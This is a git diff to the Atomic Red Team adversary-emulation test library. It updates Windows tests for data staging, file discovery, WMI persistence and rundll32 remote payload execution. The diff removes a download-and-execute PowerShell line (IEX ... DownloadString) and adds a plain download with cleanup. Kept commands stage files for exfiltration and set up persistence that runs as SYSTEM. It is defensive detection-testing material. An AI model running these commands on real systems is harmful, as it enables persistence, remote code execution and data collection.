diff --git a/atomics/T1074/T1074.md b/atomics/T1074/T1074.md
index f1d4dfa3..013cd8d4 100644
--- a/atomics/T1074/T1074.md
+++ b/atomics/T1074/T1074.md
@@ -16,21 +16,31 @@ Interactive command shells may be used, and common functionality within [cmd](ht
 <br/>
 
 ## Atomic Test #1 - Stage data from Discovery.bat
-Utilize powershell to download discovery.bat and save to a local file
+Utilize powershell to download discovery.bat and save to a local file. This emulates an attacker downloading data collection tools onto the host. Upon execution,
+verify that the file is saved in the temp directory.
 
 **Supported Platforms:** Windows
 
 
 
 
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| output_file | Location to save downloaded discovery.bat file | Path | $env:TEMP&#92;discovery.bat|
+
 
 #### Attack Commands: Run with `powershell`! 
 
 
 ```powershell
-IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.bat') > pi.log
+Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.bat" -OutFile #{output_file}
 ```
 
+#### Cleanup Commands:
+```powershell
+Remove-Item -Force #{output_file} -ErrorAction Ignore
+```
 
 
 
@@ -64,24 +74,31 @@ curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ato
 <br/>
 
 ## Atomic Test #3 - Zip a Folder with PowerShell for Staging in Temp
-Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration.
+Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon execution, Verify that a zipped folder named Folder_to_zip.zip
+was placed in the temp directory.
 
 **Supported Platforms:** Windows
 
 
 
 
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| input_file | Location of file or folder to zip | Path | PathToAtomicsFolder&#92;T1074&#92;bin&#92;Folder_to_zip|
+| output_file | Location to save zipped file or folder | Path | $env:TEMP&#92;Folder_to_zip.zip|
+
 
 #### Attack Commands: Run with `powershell`! 
 
 
 ```powershell
-Compress-Archive -Path $PathToAtomicsFolder\T1074\bin\Folder_to_zip -DestinationPath $env:TEMP\Folder_to_zip.zip
+Compress-Archive -Path #{input_file} -DestinationPath #{output_file} -Force
 ```
 
 #### Cleanup Commands:
 ```powershell
-Remove-Item -Path $env:TEMP\Folder_to_zip.zip -ErrorAction Ignore
+Remove-Item -Path #{output_file} -ErrorAction Ignore
 ```
 
 
diff --git a/atomics/T1083/T1083.md b/atomics/T1083/T1083.md
index 8a89d446..a7cd04eb 100644
--- a/atomics/T1083/T1083.md
+++ b/atomics/T1083/T1083.md
@@ -24,7 +24,8 @@ In Mac and Linux, this kind of discovery is accomplished with the <code>ls</code
 <br/>
 
 ## Atomic Test #1 - File and Directory Discovery (cmd.exe)
-Find or discover files on the file system
+Find or discover files on the file system.  Upon execution, the file "download" will be placed in the temporary folder and contain the output of
+all of the data discovery commands.
 
 **Supported Platforms:** Windows
 
@@ -39,7 +40,6 @@ Find or discover files on the file system
 dir /s c:\ >> %temp%\download
 dir /s "c:\Documents and Settings" >> %temp%\download
 dir /s "c:\Program Files\" >> %temp%\download
-dir /s d:\ >> %temp%\download
 dir "%systemdrive%\Users\*.*" >> %temp%\download
 dir "%userprofile%\AppData\Roaming\Microsoft\Windows\Recent\*.*" >> %temp%\download
 dir "%userprofile%\Desktop\*.*" >> %temp%\download
@@ -55,7 +55,7 @@ tree /F >> %temp%\download
 <br/>
 
 ## Atomic Test #2 - File and Directory Discovery (PowerShell)
-Find or discover files on the file system
+Find or discover files on the file system. Upon execution, file and folder information will be displayed.
 
 **Supported Platforms:** Windows
 
diff --git a/atomics/T1084/T1084.md b/atomics/T1084/T1084.md
index 6f555bf1..9d6fd383 100644
--- a/atomics/T1084/T1084.md
+++ b/atomics/T1084/T1084.md
@@ -4,15 +4,14 @@
 
 ## Atomic Tests
 
-- [Atomic Test #1 - Persistence](#atomic-test-1---persistence)
+- [Atomic Test #1 - Persistence via WMI Event Subscription](#atomic-test-1---persistence-via-wmi-event-subscription)
 
 
 <br/>
 
-## Atomic Test #1 - Persistence
-Run from an administrator powershell window
-
-After running, reboot the victim machine. After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.
+## Atomic Test #1 - Persistence via WMI Event Subscription
+Run from an administrator powershell window. After running, reboot the victim machine.
+After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.
 
 Code references
 
@@ -52,7 +51,6 @@ $FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassNa
 $EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
 $EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
 $FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue
-
 $FilterConsumerBindingToCleanup | Remove-WmiObject
 $EventConsumerToCleanup | Remove-WmiObject
 $EventFilterToCleanup | Remove-WmiObject
diff --git a/atomics/T1085/T1085.md b/atomics/T1085/T1085.md
index 3c495239..58bb0399 100644
--- a/atomics/T1085/T1085.md
+++ b/atomics/T1085/T1085.md
@@ -24,7 +24,7 @@ Rundll32 can also been used to execute scripts such as JavaScript. This can be d
 <br/>
 
 ## Atomic Test #1 - Rundll32 execute JavaScript Remote Payload With GetObject
-Test execution of a remote script using rundll32.exe
+Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened.
 
 **Supported Platforms:** Windows
 
diff --git a/atomics/index.md b/atomics/index.md
index 18884c53..a2e4aab4 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -141,7 +141,7 @@
 - [T1100 Web Shell](./T1100/T1100.md)
   - Atomic Test #1: Web Shell Written to Disk [windows]
 - [T1084 Windows Management Instrumentation Event Subscription](./T1084/T1084.md)
-  - Atomic Test #1: Persistence [windows]
+  - Atomic Test #1: Persistence via WMI Event Subscription [windows]
 - [T1004 Winlogon Helper DLL](./T1004/T1004.md)
   - Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
   - Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows]
diff --git a/atomics/index.yaml b/atomics/index.yaml
index 56294edc..87171f76 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -5075,11 +5075,10 @@ persistence:
       modified: '2019-10-15T18:43:47.703Z'
       identifier: T1084
     atomic_tests:
-    - name: Persistence
+    - name: Persistence via WMI Event Subscription
       description: |
-        Run from an administrator powershell window
-
-        After running, reboot the victim machine. After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.
+        Run from an administrator powershell window. After running, reboot the victim machine.
+        After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.
 
         Code references
 
@@ -5111,7 +5110,6 @@ persistence:
           $EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
           $EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
           $FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue
-
           $FilterConsumerBindingToCleanup | Remove-WmiObject
           $EventConsumerToCleanup | Remove-WmiObject
           $EventFilterToCleanup | Remove-WmiObject
@@ -11663,7 +11661,8 @@ defense-evasion:
       identifier: T1085
     atomic_tests:
     - name: Rundll32 execute JavaScript Remote Payload With GetObject
-      description: 'Test execution of a remote script using rundll32.exe
+      description: 'Test execution of a remote script using rundll32.exe. Upon execution
+        notepad.exe will be opened.
 
 '
       supported_platforms:
@@ -17338,9 +17337,9 @@ discovery:
       identifier: T1083
     atomic_tests:
     - name: File and Directory Discovery (cmd.exe)
-      description: 'Find or discover files on the file system
-
-'
+      description: |
+        Find or discover files on the file system.  Upon execution, the file "download" will be placed in the temporary folder and contain the output of
+        all of the data discovery commands.
       supported_platforms:
       - windows
       executor:
@@ -17350,13 +17349,13 @@ discovery:
           dir /s c:\ >> %temp%\download
           dir /s "c:\Documents and Settings" >> %temp%\download
           dir /s "c:\Program Files\" >> %temp%\download
-          dir /s d:\ >> %temp%\download
           dir "%systemdrive%\Users\*.*" >> %temp%\download
           dir "%userprofile%\AppData\Roaming\Microsoft\Windows\Recent\*.*" >> %temp%\download
           dir "%userprofile%\Desktop\*.*" >> %temp%\download
           tree /F >> %temp%\download
     - name: File and Directory Discovery (PowerShell)
-      description: 'Find or discover files on the file system
+      description: 'Find or discover files on the file system. Upon execution, file
+        and folder information will be displayed.
 
 '
       supported_platforms:
@@ -23689,7 +23688,8 @@ execution:
       identifier: T1085
     atomic_tests:
     - name: Rundll32 execute JavaScript Remote Payload With GetObject
-      description: 'Test execution of a remote script using rundll32.exe
+      description: 'Test execution of a remote script using rundll32.exe. Upon execution
+        notepad.exe will be opened.
 
 '
       supported_platforms:
@@ -27306,17 +27306,24 @@ collection:
       identifier: T1074
     atomic_tests:
     - name: Stage data from Discovery.bat
-      description: 'Utilize powershell to download discovery.bat and save to a local
-        file
-
-'
+      description: |
+        Utilize powershell to download discovery.bat and save to a local file. This emulates an attacker downloading data collection tools onto the host. Upon execution,
+        verify that the file is saved in the temp directory.
       supported_platforms:
       - windows
+      input_arguments:
+        output_file:
+          description: Location to save downloaded discovery.bat file
+          type: Path
+          default: "$env:TEMP\\discovery.bat"
       executor:
         name: powershell
         elevation_required: false
-        command: 'IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.bat'')
-          > pi.log
+        command: 'Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.bat"
+          -OutFile #{output_file}
+
+'
+        cleanup_command: 'Remove-Item -Force #{output_file} -ErrorAction Ignore
 
 '
     - name: Stage data from Discovery.sh
@@ -27334,21 +27341,28 @@ collection:
 
 '
     - name: Zip a Folder with PowerShell for Staging in Temp
-      description: 'Use living off the land tools to zip a file and stage it in the
-        Windows temporary folder for later exfiltration.
-
-'
+      description: |
+        Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon execution, Verify that a zipped folder named Folder_to_zip.zip
+        was placed in the temp directory.
       supported_platforms:
       - windows
+      input_arguments:
+        input_file:
+          description: Location of file or folder to zip
+          type: Path
+          default: PathToAtomicsFolder\T1074\bin\Folder_to_zip
+        output_file:
+          description: Location to save zipped file or folder
+          type: Path
+          default: "$env:TEMP\\Folder_to_zip.zip"
       executor:
         name: powershell
         elevation_required: false
-        command: 'Compress-Archive -Path $PathToAtomicsFolder\T1074\bin\Folder_to_zip
-          -DestinationPath $env:TEMP\Folder_to_zip.zip
+        command: 'Compress-Archive -Path #{input_file} -DestinationPath #{output_file}
+          -Force
 
 '
-        cleanup_command: 'Remove-Item -Path $env:TEMP\Folder_to_zip.zip -ErrorAction
-          Ignore
+        cleanup_command: 'Remove-Item -Path #{output_file} -ErrorAction Ignore
 
 '
   '':
diff --git a/atomics/windows-index.md b/atomics/windows-index.md
index 3332ebf0..2c31411d 100644
--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -339,7 +339,7 @@
 - [T1100 Web Shell](./T1100/T1100.md)
   - Atomic Test #1: Web Shell Written to Disk [windows]
 - [T1084 Windows Management Instrumentation Event Subscription](./T1084/T1084.md)
-  - Atomic Test #1: Persistence [windows]
+  - Atomic Test #1: Persistence via WMI Event Subscription [windows]
 - [T1004 Winlogon Helper DLL](./T1004/T1004.md)
   - Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
   - Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows]